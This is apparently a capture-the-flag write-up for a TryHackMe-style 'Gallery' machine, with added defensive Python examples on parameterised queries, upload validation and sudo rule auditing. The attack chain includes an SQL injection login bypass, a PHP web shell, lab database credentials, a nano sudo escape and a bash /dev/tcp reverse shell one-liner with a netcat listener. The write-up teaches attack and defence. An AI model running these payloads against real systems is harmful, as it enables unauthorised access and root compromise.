Gallery

Web Recon - File Upload - Mike's backup folder - Nano PrivEsc

Recon

  • First I ran Rust-nmap and found two open ports: port 80 and port 8080

# Nmap 7.92 scan initiated Sat Feb 12 22:32:01 2022 as: nmap -A -oN nmap-scan 10.10.112.90
Nmap scan report for 10.10.112.90
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-title: Simple Image Gallery System
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Feb 12 22:33:06 2022 -- 1 IP address (1 host up) scanned in 65.51 seconds
  • Decided to open port 80 in my browser and it gave the Apache server default page

  • Now I open up the other port, 8080, which is a proxy, and it redirects me to https://ip/gallery/ which has a login page

Initial Access & Foothold

  • So on the login page I try SQLi with the payload: admin ' or 1=1 limit 1-- +' and I was able to log in as administrator
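
The bypass above works because the login query is built by string concatenation. The following is an added example (not code from the write-up or from the Simple Image Gallery System) that runs the exact payload against a concatenated query and against a parameterised one, using an in-memory SQLite table as a stand-in for the MySQL users table. It assumes the app stores passwords as unsalted MD5 hex digests, which the 32-hex-digit hash in initialize.php suggests but the page does not state; the admin row and its password are constructed sample data.

```python
import hashlib
import hmac
import sqlite3

# Constructed sample data (not the room's real users): one admin whose password
# is stored as an unsalted MD5 hex digest (assumption: the app hashes with md5()).
ADMIN_PASSWORD = "correct-horse-battery"

# The exact payload from the write-up, submitted as the username field.
PAYLOAD = "admin ' or 1=1 limit 1-- +'"


def md5_hex(text):
    return hashlib.md5(text.encode()).hexdigest()


def build_db():
    """In-memory SQLite stand-in for the gallery's MySQL users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)",
                 ("admin", md5_hex(ADMIN_PASSWORD)))
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """Builds the WHERE clause by concatenation, so the username field can close
    the quote, append "or 1=1 limit 1" and comment out the password check.
    Returns the matched username, or None."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + md5_hex(password) + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Binds the username as a parameter (the payload is then just a string that
    matches no user) and compares the stored hash in constant time."""
    row = conn.execute("SELECT username, password FROM users WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return None
    return row[0] if hmac.compare_digest(row[1], md5_hex(password)) else None


if __name__ == "__main__":
    db = build_db()
    print("concatenated query:", vulnerable_login(db, PAYLOAD, "anything"))
    print("parameterised query:", safe_login(db, PAYLOAD, "anything"))
```

Parameter binding is the fix for the injection; it does nothing about the unsalted, fast hash, which is a separate weakness that a slow salted scheme (PHP's password_hash()) addresses.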

  • Looking around the dashboard I found an upload field in the profile settings, so I uploaded a file, captured the request, and then edited the file contents to a simple web shell

[tahaafarooq@urchinsec-lab gallery]$ curl "http://10.10.118.206/gallery/uploads/1644852240_shell.php?0=id"
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
  • And now time to pop shell
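
The upload handler accepted a .php file and stored it under the web root with a predictable name (timestamp plus the original filename, as seen in 1644852240_shell.php). The following is an added example of the checks such a handler should perform; it is not code from the write-up or from the gallery application. The extension allow-list, the 5 MiB limit and the 0640 file mode are assumptions chosen for illustration.

```python
import os
import secrets
from pathlib import PurePath

# Allow-list: each permitted extension and the file signature(s) it must begin with.
ALLOWED_TYPES = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 5 * 1024 * 1024  # assumption: 5 MiB is plenty for a gallery photo


def check_upload(original_name, data):
    """Return (stored_name, None) if the file may be stored, else (None, reason).

    The stored name is random and carries only the validated extension, so
    neither the client's filename nor a timestamp reaches the filesystem."""
    ext = PurePath(original_name).suffix.lower()  # last suffix only: a.png.php -> .php
    if ext not in ALLOWED_TYPES:
        return None, "extension not allowed: " + ext
    if len(data) > MAX_BYTES:
        return None, "file too large"
    if not any(data.startswith(sig) for sig in ALLOWED_TYPES[ext]):
        return None, "content does not match declared type"
    if b"<?" in data:  # cheap polyglot check: a real image with PHP appended
        return None, "embedded script tag"
    return secrets.token_hex(16) + ext, None


def save_upload(upload_dir, stored_name, data):
    """Write into a directory outside the web root, with O_EXCL so an existing
    file is never overwritten and mode 0640 so no execute bit is set."""
    path = os.path.join(upload_dir, stored_name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


if __name__ == "__main__":
    print(check_upload("shell.php", b"<?php echo 1; ?>"))
    print(check_upload("photo.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 8))
```

The directory chosen for save_upload must not be one Apache maps to a URL; files are handed back through an application route that sets the Content-Type itself. With that in place, even a mistake in check_upload does not turn an upload into executable code.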

  • Now that I have shell, I decided to look for configuration files, and I found config.php but it was importing files from another folder

<?php
ob_start();
ini_set('date.timezone','Asia/Manila');
date_default_timezone_set('Asia/Manila');
session_start();

require_once('initialize.php');
require_once('classes/DBConnection.php');
require_once('classes/SystemSettings.php');
$db = new DBConnection;
$conn = $db->conn;
  • I was able to find DBConnection.php in the classes folder and it had the following

<?php
if(!defined('DB_SERVER')){
    require_once("../initialize.php");
}
class DBConnection{

    private $host = DB_SERVER;
    private $username = DB_USERNAME;
    private $password = DB_PASSWORD;
    private $database = DB_NAME;
    
    public $conn;
    
    public function __construct(){

        if (!isset($this->conn)) {
            
            $this->conn = new mysqli($this->host, $this->username, $this->password, $this->database);
            
            if (!$this->conn) {
                echo 'Cannot connect to database server';
                exit;
            }            
        }    
        
    }
    public function __destruct(){
        $this->conn->close();
    }
}
?>
  • which means the values of those variables are in initialize.php

<?php
$dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');

if(!defined('base_url')) define('base_url',"http://" . $_SERVER['SERVER_ADDR'] . "/gallery/");
if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
if(!defined('dev_data')) define('dev_data',$dev_data);
if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
if(!defined('DB_USERNAME')) define('DB_USERNAME',"gallery_user");
if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"passw0rd321");
if(!defined('DB_NAME')) define('DB_NAME',"gallery_db");
?>
  • I was able to get the MySQL creds and the $dev_data information, which seem to be creds for the developer, with the username and the password as a hash. I was able to answer question three by logging in to MySQL and copying the hash for admin!

  • The first thing I did was update the shell so it doesn't give those shell errors

www-data@gallery:/var/backups/mike_home_backup$ /usr/bin/script -qc /bin/bash /dev/null
<ome_backup$ /usr/bin/script -qc /bin/bash /dev/null
www-data@gallery:/var/backups/mike_home_backup$ ^Z
[1]+  Stopped                 nc -lnvp 1337
[tahaafarooq@urchinsec-lab urchinshell]$ stty raw -echo; fg
nc -lnvp 1337
export TERM=xterm
  • I was able to update the shell, and as I was checking through /var/backups I saw a backup folder for the user mike, so I read the history and was able to get the password

www-data@gallery:/var/backups/mike_home_backup$ cat .bash_history
cat .bash_history
cd ~
ls
ping 1.1.1.1
cat /home/mike/user.txt
cd /var/www/
ls
cd html
ls -al
cat index.html
sudo -lb[REDACTED]x
clear
sudo -l
exit

User.txt

www-data@gallery:/var/backups/mike_home_backup$ su mike
Password: 
mike@gallery:/var/backups/mike_home_backup$ cd ~
mike@gallery:~$ ls
documents  images  user.txt
mike@gallery:~$ cat user.txt
THM{af05[REDACTED]46ef}

Privilege Escalation

  • I first ran sudo -l to see what commands mike can run as root

mike@gallery:~$ sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh
  • I read the file /opt/rootkit.sh

#!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck)
        /usr/bin/rkhunter --versioncheck ;;
    update)
        /usr/bin/rkhunter --update;;
    list)
        /usr/bin/rkhunter --list;;
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac
  • After looking at the contents of rootkit.sh, we have four choices: versioncheck, update, list and read. Of the available choices, the last one seems interesting, as we can run nano as root. Time for a quick look at GTFOBins
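
The weakness here is not nano itself but a NOPASSWD rule that runs an interpreter on a script, and a script that hands an interactive editor to root. The following is an added example of an audit that catches both patterns; it is not code from the write-up. It parses sudo -l output and scans the referenced script for editors and pagers known to offer a shell escape. The sudo -l text and rootkit.sh contents are embedded as constructed samples copied from the page; in real use the script would be read from disk. The lists of interpreters and escape-capable binaries are assumptions for illustration and are not exhaustive.

```python
import os
import re
import shlex

# Interpreters that, named directly in a sudo rule, give root to whatever script
# follows; editors and pagers that offer a shell escape when run interactively.
INTERPRETERS = {"bash", "sh", "dash", "zsh", "python", "python3", "perl", "ruby"}
SHELL_ESCAPE_BINS = {"nano", "pico", "vi", "vim", "less", "more", "man", "ed", "emacs"}

# One command line of `sudo -l` output, e.g. "(root) NOPASSWD: /bin/bash /opt/x.sh"
RULE_RE = re.compile(r"\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)")

# Constructed samples copied from the page (the target's sudo -l output and script).
SAMPLE_SUDO_L = """\
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh
"""
SAMPLE_ROOTKIT_SH = """\
#!/bin/bash

read -e -p "Would you like to versioncheck, update, list or read the report ? " ans;

# Execute your choice
case $ans in
    versioncheck)
        /usr/bin/rkhunter --versioncheck ;;
    update)
        /usr/bin/rkhunter --update;;
    list)
        /usr/bin/rkhunter --list;;
    read)
        /bin/nano /root/report.txt;;
    *)
        exit;;
esac
"""


def parse_sudo_l(text):
    """Return [(runas, nopasswd, argv)] for each command listed by `sudo -l`."""
    rules, in_commands = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("User ") and "may run" in line:
            in_commands = True
            continue
        if not in_commands or not line:
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append((m.group("runas"), "NOPASSWD:" in m.group("tags"),
                          shlex.split(m.group("cmd"))))
    return rules


def audit(rules, scripts):
    """scripts maps a script path to its text. Returns a list of finding strings."""
    findings = []
    for runas, nopasswd, argv in rules:
        if not argv:
            continue
        if nopasswd:
            findings.append(f"NOPASSWD rule: {' '.join(argv)} runs as {runas} without authentication")
        if os.path.basename(argv[0]) in INTERPRETERS and len(argv) > 1:
            script = argv[1]
            findings.append(f"{argv[0]} executes {script} as {runas}: "
                            "the script and its directory must not be writable by the caller")
            for lineno, line in enumerate(scripts.get(script, "").splitlines(), 1):
                try:
                    tokens = shlex.split(line, comments=True)
                except ValueError:  # unbalanced quotes on a shell line; skip it
                    continue
                for tok in tokens:
                    if os.path.basename(tok.rstrip(";")) in SHELL_ESCAPE_BINS:
                        findings.append(f"{script}:{lineno} runs {tok} as {runas}: "
                                        "interactive editor/pager offers a shell escape")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_sudo_l(SAMPLE_SUDO_L), {"/opt/rootkit.sh": SAMPLE_ROOTKIT_SH}):
        print(finding)
```

The fix the audit points at is to replace the editor with a non-interactive reader such as /bin/cat /root/report.txt, keep /opt/rootkit.sh root-owned and not writable by mike, and drop NOPASSWD unless the script is genuinely safe to run unauthenticated. The token scan is a heuristic: a binary reached through a variable, an alias or a wrapper script is not caught.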

^R^X [control+R + control+X]
reset; sh 1>&0 2>&0
  • and from here I can now type

/bin/bash -c "bash -i &>/dev/tcp/tunip/port <&1"
  • Set up a listener on your terminal and boom, we have a root shell

[tahaafarooq@urchinsec-lab gallery]$ nc -lvnp 1122
Connection from 10.10.170.61:54522
root@gallery:~# id
id
uid=0(root) gid=0(root) groups=0(root)